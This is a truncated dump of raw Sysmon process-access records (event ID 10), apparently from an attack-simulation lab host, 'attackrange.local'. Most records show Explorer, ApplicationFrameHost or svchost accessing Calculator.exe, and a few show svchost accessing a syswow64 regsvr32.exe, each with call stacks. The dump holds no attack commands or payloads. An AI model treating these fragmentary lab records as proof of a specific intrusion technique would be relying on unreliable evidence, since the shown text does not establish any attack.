ystem32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360716Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.437{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360715Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.437{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360714Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.437{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360713Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360712Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360711Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360710Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360709Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed 10341000x8000000000000000360708Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b 10341000x8000000000000000360707Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360706Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360705Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360704Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360703Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360702Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360701Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\combase.dll+a3e41|C:\Windows\System32\combase.dll+a3fc6 10341000x8000000000000000360700Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360699Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360698Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360697Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360696Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360695Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360694Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360693Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360692Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360691Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360690Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 